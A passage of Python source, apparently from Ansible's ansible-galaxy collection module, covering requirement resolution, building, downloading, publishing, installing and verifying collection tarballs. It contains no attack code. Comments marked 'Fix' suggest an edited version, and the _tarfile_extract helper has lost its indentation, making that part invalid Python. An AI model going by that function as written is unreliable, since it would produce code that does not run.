        return CollectionRequirement(namespace, name, b_path, None, [version], version, force, parent=parent,
                                     metadata=meta, files=files, allow_pre_releases=allow_pre_release)
    @staticmethod
    def from_path(b_path, force, parent=None, fallback_metadata=False):
        """Create a CollectionRequirement from an installed (or source) collection directory.

        Reads MANIFEST.json/FILES.json when present; optionally falls back to galaxy.yml,
        and finally infers namespace/name from the directory layout with version '*'.

        :param b_path: Byte-string path to the collection directory.
        :param force: Whether this requirement is being force (re)installed.
        :param parent: Name of the requirement's parent when resolved as a dependency.
        :param fallback_metadata: Whether to fall back to galaxy.yml when no manifest exists.
        :return: A new CollectionRequirement flagged as already installed (skip=True).
        """
        info = {}
        for b_file_name, property_name in CollectionRequirement._FILE_MAPPING:
            b_file_path = os.path.join(b_path, b_file_name)
            if not os.path.exists(b_file_path):
                continue
            with open(b_file_path, 'rb') as file_obj:
                try:
                    info[property_name] = json.loads(to_text(file_obj.read(), errors='surrogate_or_strict'))
                except ValueError:
                    raise AnsibleError("Collection file at '%s' does not contain a valid json string."
                                       % to_native(b_file_path))

        # No built manifests found: synthesize them from galaxy.yml when allowed.
        if not info and fallback_metadata:
            b_galaxy_path = os.path.join(b_path, b'galaxy.yml')
            if os.path.exists(b_galaxy_path):
                collection_meta = _get_galaxy_yml(b_galaxy_path)
                info['files_file'] = _build_files_manifest(b_path, collection_meta['namespace'], collection_meta['name'],
                                                           collection_meta['build_ignore'])
                info['manifest_file'] = _build_manifest(**collection_meta)

        allow_pre_release = False
        if 'manifest_file' in info:
            manifest = info['manifest_file']['collection_info']
            namespace = manifest['namespace']
            name = manifest['name']
            version = to_text(manifest['version'], errors='surrogate_or_strict')

            try:
                _v = SemanticVersion()
                _v.parse(version)
                if _v.is_prerelease:
                    allow_pre_release = True
            except ValueError:
                # Unparseable version: keep the collection usable by treating it as unknown.
                display.warning("Collection at '%s' does not have a valid version set, falling back to '*'. Found "
                                "version: '%s'" % (to_text(b_path), version))
                version = '*'

            dependencies = manifest['dependencies']
        else:
            if fallback_metadata:
                warning = "Collection at '%s' does not have a galaxy.yml or a MANIFEST.json file, cannot detect version."
            else:
                warning = "Collection at '%s' does not have a MANIFEST.json file, cannot detect version."
            display.warning(warning % to_text(b_path))

            # Infer namespace/name from the '<namespace>/<name>' directory layout.
            parent_dir, name = os.path.split(to_text(b_path, errors='surrogate_or_strict'))
            namespace = os.path.split(parent_dir)[1]

            version = '*'
            dependencies = {}

        meta = CollectionVersionMetadata(namespace, name, version, None, None, dependencies)

        files = info.get('files_file', {}).get('files', {})

        return CollectionRequirement(namespace, name, b_path, None, [version], version, force, parent=parent,
                                     metadata=meta, files=files, skip=True, allow_pre_releases=allow_pre_release)
    @staticmethod
    def from_name(collection, apis, requirement, force, parent=None, allow_pre_release=False):
        """Resolve a collection requirement by dotted name against a list of Galaxy servers.

        The first server that knows the collection wins; a 404 from a server moves on to the next.

        :param collection: Dotted collection name, e.g. ``namespace.name``.
        :param apis: GalaxyAPI objects to query, in order.
        :param requirement: Version requirement string (exact version, range operators, or '*').
        :param force: Whether this requirement is being force (re)installed.
        :param parent: Name of the requirement's parent when resolved as a dependency.
        :param allow_pre_release: Whether pre-release versions may satisfy the requirement.
        :raises AnsibleError: When no configured server can provide the collection.
        :return: A new CollectionRequirement.
        """
        namespace, name = collection.split('.', 1)
        galaxy_meta = None

        for api in apis:
            try:
                if not (requirement == '*' or requirement.startswith('<') or requirement.startswith('>') or
                        requirement.startswith('!=')):
                    # Exact requirement
                    allow_pre_release = True

                    if requirement.startswith('='):
                        requirement = requirement.lstrip('=')

                    # An exact pin only needs that one version's metadata, not the full version list.
                    resp = api.get_collection_version_metadata(namespace, name, requirement)

                    galaxy_meta = resp
                    versions = [resp.version]
                else:
                    versions = api.get_collection_versions(namespace, name)
            except GalaxyError as err:
                if err.http_code == 404:
                    # Not on this server; try the next one.
                    display.vvv("Collection '%s' is not available from server %s %s"
                                % (collection, api.name, api.api_server))
                    continue
                raise

            display.vvv("Collection '%s' obtained from server %s %s" % (collection, api.name, api.api_server))
            break
        else:
            raise AnsibleError("Failed to find collection %s:%s" % (collection, requirement))

        req = CollectionRequirement(namespace, name, None, api, versions, requirement, force, parent=parent,
                                    metadata=galaxy_meta, allow_pre_releases=allow_pre_release)
        return req
def build_collection(collection_path, output_path, force):
    """
    Creates the Ansible collection artifact in a .tar.gz file.

    :param collection_path: The path to the collection to build. This should be the directory that contains the
        galaxy.yml file.
    :param output_path: The path to create the collection build artifact. This should be a directory.
    :param force: Whether to overwrite an existing collection build artifact or fail.
    :return: The path to the collection build artifact.
    """
    b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')
    b_galaxy_path = os.path.join(b_collection_path, b'galaxy.yml')
    if not os.path.exists(b_galaxy_path):
        raise AnsibleError("The collection galaxy.yml path '%s' does not exist." % to_native(b_galaxy_path))

    collection_meta = _get_galaxy_yml(b_galaxy_path)
    file_manifest = _build_files_manifest(b_collection_path, collection_meta['namespace'], collection_meta['name'],
                                          collection_meta['build_ignore'])
    collection_manifest = _build_manifest(**collection_meta)

    # Artifact name follows the <namespace>-<name>-<version>.tar.gz convention.
    collection_output = os.path.join(output_path, "%s-%s-%s.tar.gz" % (collection_meta['namespace'],
                                                                       collection_meta['name'],
                                                                       collection_meta['version']))

    b_collection_output = to_bytes(collection_output, errors='surrogate_or_strict')
    if os.path.exists(b_collection_output):
        if os.path.isdir(b_collection_output):
            raise AnsibleError("The output collection artifact '%s' already exists, "
                               "but is a directory - aborting" % to_native(collection_output))
        elif not force:
            raise AnsibleError("The file '%s' already exists. You can use --force to re-create "
                               "the collection artifact." % to_native(collection_output))

    _build_collection_tar(b_collection_path, b_collection_output, collection_manifest, file_manifest)
    # Fix: the docstring promises the artifact path but the function previously returned None.
    return collection_output
def download_collections(collections, output_path, apis, validate_certs, no_deps, allow_pre_release):
    """
    Download Ansible collections as their tarball from a Galaxy server to the path specified and creates a requirements
    file of the downloaded requirements to be used for an install.

    :param collections: The collections to download, should be a list of tuples with (name, requirement, Galaxy Server).
    :param output_path: The path to download the collections to.
    :param apis: A list of GalaxyAPIs to query when search for a collection.
    :param validate_certs: Whether to validate the certificate if downloading a tarball from a non-Galaxy host.
    :param no_deps: Ignore any collection dependencies and only download the base requirements.
    :param allow_pre_release: Do not ignore pre-release versions when selecting the latest.
    """
    with _tempdir() as b_temp_path:
        display.display("Process install dependency map")
        # Resolve the full dependency map first so dependencies are downloaded too (unless no_deps).
        with _display_progress():
            dep_map = _build_dependency_map(collections, [], b_temp_path, apis, validate_certs, True, True, no_deps,
                                            allow_pre_release=allow_pre_release)

        requirements = []
        display.display("Starting collection download process to '%s'" % output_path)
        with _display_progress():
            for name, requirement in dep_map.items():
                collection_filename = "%s-%s-%s.tar.gz" % (requirement.namespace, requirement.name,
                                                           requirement.latest_version)
                dest_path = os.path.join(output_path, collection_filename)
                requirements.append({'name': collection_filename, 'version': requirement.latest_version})

                display.display("Downloading collection '%s' to '%s'" % (name, dest_path))

                # Download into the temp dir first, then move the finished file into place.
                b_temp_download_path = requirement.download(b_temp_path)
                shutil.move(b_temp_download_path, to_bytes(dest_path, errors='surrogate_or_strict'))

            # Emit a requirements.yml pointing at the downloaded tarballs for a later offline install.
            requirements_path = os.path.join(output_path, 'requirements.yml')
            display.display("Writing requirements.yml file of downloaded collections to '%s'" % requirements_path)
            with open(to_bytes(requirements_path, errors='surrogate_or_strict'), mode='wb') as req_fd:
                req_fd.write(to_bytes(yaml.safe_dump({'collections': requirements}), errors='surrogate_or_strict'))
def publish_collection(collection_path, api, wait, timeout):
    """
    Publish an Ansible collection tarball into an Ansible Galaxy server.

    :param collection_path: The path to the collection tarball to publish.
    :param api: A GalaxyAPI to publish the collection to.
    :param wait: Whether to wait until the import process is complete.
    :param timeout: The time in seconds to wait for the import process to finish, 0 is indefinite.
    """
    import_uri = api.publish_collection(collection_path)

    if not wait:
        display.display("Collection has been pushed to the Galaxy server %s %s, not waiting until import has "
                        "completed due to --no-wait being set. Import task results can be found at %s"
                        % (api.name, api.api_server, import_uri))
        return

    # Galaxy returns a url fragment which differs between v2 and v3. The second to last entry is
    # always the task_id, though.
    # v2: {"task": "https://galaxy-dev.ansible.com/api/v2/collection-imports/35573/"}
    # v3: {"task": "/api/automation-hub/v3/imports/collections/838d1308-a8f4-402c-95cb-7823f3806cd8/"}
    task_id = next((segment for segment in reversed(import_uri.split('/')) if segment), None)

    if not task_id:
        raise AnsibleError("Publishing the collection did not return valid task info. Cannot wait for task status. Returned task info: '%s'" % import_uri)

    display.display("Collection has been published to the Galaxy server %s %s" % (api.name, api.api_server))
    with _display_progress():
        api.wait_import_task(task_id, timeout)
    display.display("Collection has been successfully published and imported to the Galaxy server %s %s"
                    % (api.name, api.api_server))
def install_collections(collections, output_path, apis, validate_certs, ignore_errors, no_deps, force, force_deps,
                        allow_pre_release=False):
    """
    Install Ansible collections to the path specified.

    :param collections: The collections to install, should be a list of tuples with (name, requirement, Galaxy server).
    :param output_path: The path to install the collections to.
    :param apis: A list of GalaxyAPIs to query when searching for a collection.
    :param validate_certs: Whether to validate the certificates if downloading a tarball.
    :param ignore_errors: Whether to ignore any errors when installing the collection.
    :param no_deps: Ignore any collection dependencies and only install the base requirements.
    :param force: Re-install a collection if it has already been installed.
    :param force_deps: Re-install a collection as well as its dependencies if they have already been installed.
    :param allow_pre_release: Whether pre-release versions may be selected when resolving requirements.
    """
    # Already-installed collections are fed into resolution so unforced requirements can be satisfied in place.
    existing_collections = find_existing_collections(output_path, fallback_metadata=True)

    with _tempdir() as b_temp_path:
        display.display("Process install dependency map")
        with _display_progress():
            dependency_map = _build_dependency_map(collections, existing_collections, b_temp_path, apis,
                                                   validate_certs, force, force_deps, no_deps,
                                                   allow_pre_release=allow_pre_release)

        display.display("Starting collection install process")
        with _display_progress():
            for collection in dependency_map.values():
                try:
                    collection.install(output_path, b_temp_path)
                except AnsibleError as err:
                    if ignore_errors:
                        display.warning("Failed to install collection %s but skipping due to --ignore-errors being set. "
                                        "Error: %s" % (to_text(collection), to_text(err)))
                    else:
                        raise
def validate_collection_name(name):
    """
    Validates the collection name as an input from the user or a requirements file fit the requirements.

    :param name: The input name with optional range specifier split by ':'.
    :return: The input value, required for argparse validation.
    """
    # Strip an optional ':<version range>' suffix before validating the dotted name.
    collection = name.partition(':')[0]

    if not AnsibleCollectionRef.is_valid_collection_name(collection):
        raise AnsibleError("Invalid collection name '%s', "
                           "name must be in the format <namespace>.<collection>. \n"
                           "Please make sure namespace and collection name contains "
                           "characters from [a-zA-Z0-9_] only." % name)

    return name
def validate_collection_path(collection_path):
    """ Ensure a given path ends with 'ansible_collections'

    :param collection_path: The path that should end in 'ansible_collections'
    :return: collection_path ending in 'ansible_collections' if it does not already.
    """
    if os.path.basename(collection_path) == 'ansible_collections':
        return collection_path
    return os.path.join(collection_path, 'ansible_collections')
def verify_collections(collections, search_paths, apis, validate_certs, ignore_errors, allow_pre_release=False):
    """Verify locally installed collections against their counterparts on a Galaxy server.

    :param collections: List of (name, version requirement) tuples to verify.
    :param search_paths: Collection root paths to search for the local installs.
    :param apis: GalaxyAPIs to query for the remote artifact.
    :param validate_certs: Whether to validate certificates when downloading the remote artifact.
    :param ignore_errors: Warn instead of raising when a collection cannot be verified.
    :param allow_pre_release: Whether pre-release versions may satisfy the requirement.
    """
    with _display_progress():
        with _tempdir() as b_temp_path:
            for collection in collections:
                try:

                    local_collection = None
                    b_collection = to_bytes(collection[0], errors='surrogate_or_strict')

                    # Only dotted namespace.name identifiers can be verified — not tarballs or URLs.
                    if os.path.isfile(b_collection) or urlparse(collection[0]).scheme.lower() in ['http', 'https'] or len(collection[0].split('.')) != 2:
                        raise AnsibleError(message="'%s' is not a valid collection name. The format namespace.name is expected." % collection[0])

                    collection_name = collection[0]
                    namespace, name = collection_name.split('.')
                    collection_version = collection[1]

                    # Verify local collection exists before downloading it from a galaxy server
                    for search_path in search_paths:
                        b_search_path = to_bytes(os.path.join(search_path, namespace, name), errors='surrogate_or_strict')
                        if os.path.isdir(b_search_path):
                            if not os.path.isfile(os.path.join(to_text(b_search_path, errors='surrogate_or_strict'), 'MANIFEST.json')):
                                raise AnsibleError(
                                    message="Collection %s does not appear to have a MANIFEST.json. " % collection_name +
                                            "A MANIFEST.json is expected if the collection has been built and installed via ansible-galaxy."
                                )
                            local_collection = CollectionRequirement.from_path(b_search_path, False)
                            break
                    if local_collection is None:
                        raise AnsibleError(message='Collection %s is not installed in any of the collection paths.' % collection_name)

                    # Download collection on a galaxy server for comparison
                    try:
                        remote_collection = CollectionRequirement.from_name(collection_name, apis, collection_version, False, parent=None,
                                                                            allow_pre_release=allow_pre_release)
                    except AnsibleError as e:
                        # Re-word the generic resolution failure for the verify use case.
                        if e.message == 'Failed to find collection %s:%s' % (collection[0], collection[1]):
                            raise AnsibleError('Failed to find remote collection %s:%s on any of the galaxy servers' % (collection[0], collection[1]))
                        raise

                    download_url = remote_collection.metadata.download_url
                    headers = {}
                    remote_collection.api._add_auth_token(headers, download_url, required=False)
                    b_temp_tar_path = _download_file(download_url, b_temp_path, None, validate_certs, headers=headers)

                    # search_path still holds the path the local collection was found under (loop broke there).
                    local_collection.verify(remote_collection, search_path, b_temp_tar_path)

                except AnsibleError as err:
                    if ignore_errors:
                        display.warning("Failed to verify collection %s but skipping due to --ignore-errors being set. "
                                        "Error: %s" % (collection[0], to_text(err)))
                    else:
                        raise
@contextmanager
def _tempdir():
    """Context manager yielding a fresh temporary directory (bytes path) under the configured
    Ansible local tmp dir.

    The directory is removed on exit even when the body raises; the previous implementation
    leaked the directory on exceptions because cleanup was not in a ``finally`` block.
    """
    b_temp_path = tempfile.mkdtemp(dir=to_bytes(C.DEFAULT_LOCAL_TMP, errors='surrogate_or_strict'))
    try:
        yield b_temp_path
    finally:
        shutil.rmtree(b_temp_path)
@contextmanager
def _tarfile_extract(tar, member):
tar_obj = tar.extractfile(member)
yield tar_obj
tar_obj.close()
@contextmanager
def _display_progress():
    """Context manager that spins a progress wheel on stdout while the body runs.

    While active, the module-global ``display`` is swapped for a proxy that queues calls;
    a background thread drains the queue between wheel ticks so output stays ordered.
    On a non-TTY (or when disabled by config) the body runs with no wheel or proxying.
    """
    config_display = C.GALAXY_DISPLAY_PROGRESS
    display_wheel = sys.stdout.isatty() if config_display is None else config_display

    if not display_wheel:
        yield
        return

    def progress(display_queue, actual_display):
        # Runs in the background thread: animate the wheel and replay queued display calls.
        actual_display.debug("Starting display_progress display thread")
        t = threading.current_thread()

        while True:
            for c in "|/-\\":
                actual_display.display(c + "\b", newline=False)
                time.sleep(0.1)

                # Display a message from the main thread
                while True:
                    try:
                        method, args, kwargs = display_queue.get(block=False, timeout=0.1)
                    except queue.Empty:
                        break
                    else:
                        func = getattr(actual_display, method)
                        func(*args, **kwargs)

                if getattr(t, "finish", False):
                    actual_display.debug("Received end signal for display_progress display thread")
                    return

    class DisplayThread(object):
        # Proxy that forwards any display method call into the queue for the worker thread.

        def __init__(self, display_queue):
            self.display_queue = display_queue

        def __getattr__(self, attr):
            def call_display(*args, **kwargs):
                self.display_queue.put((attr, args, kwargs))

            return call_display

    # Temporary override the global display class with our own which add the calls to a queue for the thread to call.
    global display
    old_display = display

    try:
        display_queue = queue.Queue()
        display = DisplayThread(display_queue)
        t = threading.Thread(target=progress, args=(display_queue, old_display))
        t.daemon = True
        t.start()

        try:
            yield
        finally:
            # Signal the worker to stop and wait for it so queued output is fully flushed.
            t.finish = True
            t.join()
    except Exception:
        # The exception is re-raised so we can sure the thread is finished and not using the display anymore
        raise
    finally:
        display = old_display
def _get_galaxy_yml(b_galaxy_yml_path):
    """Parse and normalise a collection's galaxy.yml.

    Validates mandatory keys, warns about unknown ones, fills type-appropriate defaults for
    optional keys, and renames 'license' to 'license_ids'.

    :param b_galaxy_yml_path: Byte-string path to the galaxy.yml file.
    :return: Dict of normalised collection metadata.
    :raises AnsibleError: On YAML parse failure or missing mandatory keys.
    """
    # Key schema (required flag + declared type) comes from the bundled galaxy meta definition.
    meta_info = get_collections_galaxy_meta_info()

    mandatory_keys = set()
    string_keys = set()
    list_keys = set()
    dict_keys = set()

    for info in meta_info:
        if info.get('required', False):
            mandatory_keys.add(info['key'])

        key_list_type = {
            'str': string_keys,
            'list': list_keys,
            'dict': dict_keys,
        }[info.get('type', 'str')]
        key_list_type.add(info['key'])

    all_keys = frozenset(list(mandatory_keys) + list(string_keys) + list(list_keys) + list(dict_keys))

    try:
        with open(b_galaxy_yml_path, 'rb') as g_yaml:
            galaxy_yml = yaml.safe_load(g_yaml)
    except YAMLError as err:
        raise AnsibleError("Failed to parse the galaxy.yml at '%s' with the following error:\n%s"
                           % (to_native(b_galaxy_yml_path), to_native(err)))

    set_keys = set(galaxy_yml.keys())
    missing_keys = mandatory_keys.difference(set_keys)
    if missing_keys:
        raise AnsibleError("The collection galaxy.yml at '%s' is missing the following mandatory keys: %s"
                           % (to_native(b_galaxy_yml_path), ", ".join(sorted(missing_keys))))

    extra_keys = set_keys.difference(all_keys)
    if len(extra_keys) > 0:
        display.warning("Found unknown keys in collection galaxy.yml at '%s': %s"
                        % (to_text(b_galaxy_yml_path), ", ".join(extra_keys)))

    # Add the defaults if they have not been set
    for optional_string in string_keys:
        if optional_string not in galaxy_yml:
            galaxy_yml[optional_string] = None

    for optional_list in list_keys:
        list_val = galaxy_yml.get(optional_list, None)

        # A scalar where a list is expected is wrapped rather than rejected.
        if list_val is None:
            galaxy_yml[optional_list] = []
        elif not isinstance(list_val, list):
            galaxy_yml[optional_list] = [list_val]

    for optional_dict in dict_keys:
        if optional_dict not in galaxy_yml:
            galaxy_yml[optional_dict] = {}

    # license is a builtin var in Python, to avoid confusion we just rename it to license_ids
    galaxy_yml['license_ids'] = galaxy_yml['license']
    del galaxy_yml['license']

    return galaxy_yml
def _build_files_manifest(b_collection_path, namespace, name, ignore_patterns):
    """Walk the collection directory and build the FILES.json manifest structure.

    :param b_collection_path: Byte-string path to the collection root.
    :param namespace: Collection namespace (used to ignore previously built artifacts).
    :param name: Collection name.
    :param ignore_patterns: Extra fnmatch patterns from galaxy.yml's build_ignore key.
    :return: Manifest dict whose 'files' list holds one entry per file/dir with sha256 checksums for files.
    """
    # We always ignore .pyc and .retry files as well as some well known version control directories. The ignore
    # patterns can be extended by the build_ignore key in galaxy.yml
    b_ignore_patterns = [
        b'galaxy.yml',
        b'.git',
        b'*.pyc',
        b'*.retry',
        b'tests/output',  # Ignore ansible-test result output directory.
        to_bytes('{0}-{1}-*.tar.gz'.format(namespace, name)),  # Ignores previously built artifacts in the root dir.
    ]
    b_ignore_patterns += [to_bytes(p) for p in ignore_patterns]
    b_ignore_dirs = frozenset([b'CVS', b'.bzr', b'.hg', b'.git', b'.svn', b'__pycache__', b'.tox'])

    entry_template = {
        'name': None,
        'ftype': None,
        'chksum_type': None,
        'chksum_sha256': None,
        'format': MANIFEST_FORMAT
    }
    manifest = {
        'files': [
            {
                'name': '.',
                'ftype': 'dir',
                'chksum_type': None,
                'chksum_sha256': None,
                'format': MANIFEST_FORMAT,
            },
        ],
        'format': MANIFEST_FORMAT,
    }

    def _walk(b_path, b_top_level_dir):
        # Recursively record every file/dir relative to the collection root.
        for b_item in os.listdir(b_path):
            b_abs_path = os.path.join(b_path, b_item)
            b_rel_base_dir = b'' if b_path == b_top_level_dir else b_path[len(b_top_level_dir) + 1:]
            b_rel_path = os.path.join(b_rel_base_dir, b_item)
            rel_path = to_text(b_rel_path, errors='surrogate_or_strict')

            if os.path.isdir(b_abs_path):
                # Fix: the original generator expression here shadowed b_path
                # (any(b_item == b_path for b_path in b_ignore_dirs)); a direct frozenset
                # membership test is equivalent, O(1), and removes the shadowing.
                if b_item in b_ignore_dirs or \
                        any(fnmatch.fnmatch(b_rel_path, b_pattern) for b_pattern in b_ignore_patterns):
                    display.vvv("Skipping '%s' for collection build" % to_text(b_abs_path))
                    continue

                if os.path.islink(b_abs_path):
                    b_link_target = os.path.realpath(b_abs_path)

                    if not b_link_target.startswith(b_top_level_dir):
                        display.warning("Skipping '%s' as it is a symbolic link to a directory outside the collection"
                                        % to_text(b_abs_path))
                        continue

                manifest_entry = entry_template.copy()
                manifest_entry['name'] = rel_path
                manifest_entry['ftype'] = 'dir'

                manifest['files'].append(manifest_entry)

                _walk(b_abs_path, b_top_level_dir)
            else:
                if any(fnmatch.fnmatch(b_rel_path, b_pattern) for b_pattern in b_ignore_patterns):
                    display.vvv("Skipping '%s' for collection build" % to_text(b_abs_path))
                    continue

                manifest_entry = entry_template.copy()
                manifest_entry['name'] = rel_path
                manifest_entry['ftype'] = 'file'
                manifest_entry['chksum_type'] = 'sha256'
                manifest_entry['chksum_sha256'] = secure_hash(b_abs_path, hash_func=sha256)

                manifest['files'].append(manifest_entry)

    _walk(b_collection_path, b_collection_path)

    return manifest
def _build_manifest(namespace, name, version, authors, readme, tags, description, license_ids, license_file,
                    dependencies, repository, documentation, homepage, issues, **kwargs):
    """Return the MANIFEST.json structure for a collection build.

    Extra galaxy.yml keys are accepted via **kwargs and ignored. The FILES.json checksum
    is left as None and filled in later by _build_collection_tar.
    """
    collection_info = {
        'namespace': namespace,
        'name': name,
        'version': version,
        'authors': authors,
        'readme': readme,
        'tags': tags,
        'description': description,
        'license': license_ids,
        # galaxy.yml may carry an empty string here; normalise any falsy value to None.
        'license_file': license_file or None,
        'dependencies': dependencies,
        'repository': repository,
        'documentation': documentation,
        'homepage': homepage,
        'issues': issues,
    }
    file_manifest_file = {
        'name': 'FILES.json',
        'ftype': 'file',
        'chksum_type': 'sha256',
        'chksum_sha256': None,  # Filled out in _build_collection_tar
        'format': MANIFEST_FORMAT
    }

    return {
        'collection_info': collection_info,
        'file_manifest_file': file_manifest_file,
        'format': MANIFEST_FORMAT,
    }
def _build_collection_tar(b_collection_path, b_tar_path, collection_manifest, file_manifest):
    """Build the collection .tar.gz artifact from the manifests, then copy it into place.

    :param b_collection_path: Byte-string path to the collection source directory.
    :param b_tar_path: Byte-string destination path of the finished artifact.
    :param collection_manifest: MANIFEST.json dict (its FILES.json checksum is filled in here).
    :param file_manifest: FILES.json dict listing everything to add to the archive.
    """
    files_manifest_json = to_bytes(json.dumps(file_manifest, indent=True), errors='surrogate_or_strict')
    collection_manifest['file_manifest_file']['chksum_sha256'] = secure_hash_s(files_manifest_json, hash_func=sha256)
    collection_manifest_json = to_bytes(json.dumps(collection_manifest, indent=True), errors='surrogate_or_strict')

    def _reset_stat(tarinfo):
        # Normalise ownership/permissions so builds are reproducible across hosts:
        # root-owned, 0755 for dirs and executables, 0644 for everything else.
        # (Hoisted out of the file loop below — it was re-defined per iteration.)
        existing_is_exec = tarinfo.mode & stat.S_IXUSR
        tarinfo.mode = 0o0755 if existing_is_exec or tarinfo.isdir() else 0o0644
        tarinfo.uid = tarinfo.gid = 0
        tarinfo.uname = tarinfo.gname = ''
        return tarinfo

    with _tempdir() as b_temp_path:
        # Build in a temp dir first so a failed build never leaves a partial artifact behind.
        b_tar_filepath = os.path.join(b_temp_path, os.path.basename(b_tar_path))

        with tarfile.open(b_tar_filepath, mode='w:gz') as tar_file:
            # Add the MANIFEST.json and FILES.json file to the archive
            for name, b in [('MANIFEST.json', collection_manifest_json), ('FILES.json', files_manifest_json)]:
                b_io = BytesIO(b)
                tar_info = tarfile.TarInfo(name)
                tar_info.size = len(b)
                tar_info.mtime = time.time()
                tar_info.mode = 0o0644
                tar_file.addfile(tarinfo=tar_info, fileobj=b_io)

            for file_info in file_manifest['files']:
                if file_info['name'] == '.':
                    continue

                # arcname expects a native string, cannot be bytes
                filename = to_native(file_info['name'], errors='surrogate_or_strict')
                b_src_path = os.path.join(b_collection_path, to_bytes(filename, errors='surrogate_or_strict'))

                tar_file.add(os.path.realpath(b_src_path), arcname=filename, recursive=False, filter=_reset_stat)

        shutil.copy(b_tar_filepath, b_tar_path)
        collection_name = "%s.%s" % (collection_manifest['collection_info']['namespace'],
                                     collection_manifest['collection_info']['name'])
        display.display('Created collection for %s at %s' % (collection_name, to_text(b_tar_path)))
def find_existing_collections(path, fallback_metadata=False):
    """Scan an ansible_collections root at *path* and return a CollectionRequirement for
    each installed collection directory found (layout: <path>/<namespace>/<name>)."""
    collections = []

    b_path = to_bytes(path, errors='surrogate_or_strict')
    for b_namespace in os.listdir(b_path):
        b_namespace_path = os.path.join(b_path, b_namespace)
        if os.path.isfile(b_namespace_path):
            continue

        for b_collection in os.listdir(b_namespace_path):
            b_collection_path = os.path.join(b_namespace_path, b_collection)
            if not os.path.isdir(b_collection_path):
                continue

            req = CollectionRequirement.from_path(b_collection_path, False, fallback_metadata=fallback_metadata)
            display.vvv("Found installed collection %s:%s at '%s'" % (to_text(req), req.latest_version,
                                                                      to_text(b_collection_path)))
            collections.append(req)

    return collections
def _build_dependency_map(collections, existing_collections, b_temp_path, apis, validate_certs, force, force_deps,
                          no_deps, allow_pre_release=False):
    """Resolve the requested collections (and, unless no_deps, their dependencies) into a map.

    :param collections: List of (name, version, source) tuples requested by the user.
    :param existing_collections: CollectionRequirements already installed.
    :param b_temp_path: Byte-string temp dir used for any artifact downloads during resolution.
    :param apis: GalaxyAPIs to query.
    :param validate_certs: Whether to validate certificates when downloading artifacts.
    :param force: Force (re)install of the requested collections.
    :param force_deps: Force (re)install of dependencies as well.
    :param no_deps: Skip dependency resolution entirely.
    :param allow_pre_release: Whether pre-release versions may be selected.
    :return: Dict mapping 'namespace.name' to its resolved CollectionRequirement.
    """
    dependency_map = {}

    # First build the dependency map on the actual requirements
    for name, version, source in collections:
        _get_collection_info(dependency_map, existing_collections, name, version, source, b_temp_path, apis,
                             validate_certs, (force or force_deps), allow_pre_release=allow_pre_release)

    # Iterate to a fixed point: each pass may add new entries whose own deps then need checking.
    checked_parents = set([to_text(c) for c in dependency_map.values() if c.skip])
    while len(dependency_map) != len(checked_parents):
        while not no_deps:  # Only parse dependencies if no_deps was not set
            parents_to_check = set(dependency_map.keys()).difference(checked_parents)

            deps_exhausted = True
            for parent in parents_to_check:
                parent_info = dependency_map[parent]

                if parent_info.dependencies:
                    deps_exhausted = False
                    for dep_name, dep_requirement in parent_info.dependencies.items():
                        _get_collection_info(dependency_map, existing_collections, dep_name, dep_requirement,
                                             parent_info.api, b_temp_path, apis, validate_certs, force_deps,
                                             parent=parent, allow_pre_release=allow_pre_release)

                checked_parents.add(parent)

            # No extra dependencies were resolved, exit loop
            if deps_exhausted:
                break

        # Now we have resolved the deps to our best extent, now select the latest version for collections with
        # multiple versions found and go from there
        deps_not_checked = set(dependency_map.keys()).difference(checked_parents)
        for collection in deps_not_checked:
            dependency_map[collection].set_latest_version()
            if no_deps or len(dependency_map[collection].dependencies) == 0:
                checked_parents.add(collection)

    return dependency_map
def _get_collection_info(dep_map, existing_collections, collection, requirement, source, b_temp_path, apis,
                         validate_certs, force, parent=None, allow_pre_release=False):
    """Resolve one requirement (local tarball, URL, or dotted name) and merge it into *dep_map*.

    Mutates *dep_map* in place. When the collection is already in the map, the new requirement
    is added to the existing entry rather than creating a duplicate; an unforced requirement
    that matches an already-installed collection is satisfied by that install.
    """
    dep_msg = ""
    if parent:
        dep_msg = " - as dependency of %s" % parent
    display.vvv("Processing requirement collection '%s'%s" % (to_text(collection), dep_msg))

    b_tar_path = None
    if os.path.isfile(to_bytes(collection, errors='surrogate_or_strict')):
        display.vvvv("Collection requirement '%s' is a tar artifact" % to_text(collection))
        b_tar_path = to_bytes(collection, errors='surrogate_or_strict')
    elif urlparse(collection).scheme.lower() in ['http', 'https']:
        display.vvvv("Collection requirement '%s' is a URL to a tar artifact" % collection)
        try:
            b_tar_path = _download_file(collection, b_temp_path, None, validate_certs)
        except urllib_error.URLError as err:
            raise AnsibleError("Failed to download collection tar from '%s': %s"
                               % (to_native(collection), to_native(err)))

    if b_tar_path:
        req = CollectionRequirement.from_tar(b_tar_path, force, parent=parent)

        collection_name = to_text(req)
        if collection_name in dep_map:
            collection_info = dep_map[collection_name]
            # A tarball pins an exact version; record it with no parent attribution.
            collection_info.add_requirement(None, req.latest_version)
        else:
            collection_info = req
    else:
        validate_collection_name(collection)

        display.vvvv("Collection requirement '%s' is the name of a collection" % collection)
        if collection in dep_map:
            collection_info = dep_map[collection]
            collection_info.add_requirement(parent, requirement)
        else:
            # An explicit source server takes precedence over the configured server list.
            apis = [source] if source else apis
            collection_info = CollectionRequirement.from_name(collection, apis, requirement, force, parent=parent,
                                                              allow_pre_release=allow_pre_release)

    existing = [c for c in existing_collections if to_text(c) == to_text(collection_info)]
    if existing and not collection_info.force:
        # Test that the installed collection fits the requirement
        existing[0].add_requirement(parent, requirement)
        collection_info = existing[0]

    dep_map[to_text(collection_info)] = collection_info
def _download_file(url, b_path, expected_hash, validate_certs, headers=None):
    """
    Download *url* into a uniquely named temp file under bytes directory *b_path*
    and return the file's (bytes) path.

    :param expected_hash: optional SHA256 hexdigest; a mismatch raises AnsibleError.
    :param validate_certs: passed to open_url to control TLS certificate verification.
    :param headers: optional extra HTTP headers for the request.
    """
    # Name the temp file after the URL's final path segment (prefix from the stem, suffix from the extension).
    urlsplit = os.path.splitext(to_text(url.rsplit('/', 1)[1]))
    b_file_name = to_bytes(urlsplit[0], errors='surrogate_or_strict')
    b_file_ext = to_bytes(urlsplit[1], errors='surrogate_or_strict')
    b_file_path = tempfile.NamedTemporaryFile(dir=b_path, prefix=b_file_name, suffix=b_file_ext, delete=False).name

    display.vvv("Downloading %s to %s" % (url, to_text(b_path)))
    # Galaxy redirs downloads to S3 which reject the request if an Authorization header is attached so don't redir that
    resp = open_url(to_native(url, errors='surrogate_or_strict'), validate_certs=validate_certs, headers=headers,
                    unredirected_headers=['Authorization'], http_agent=user_agent())

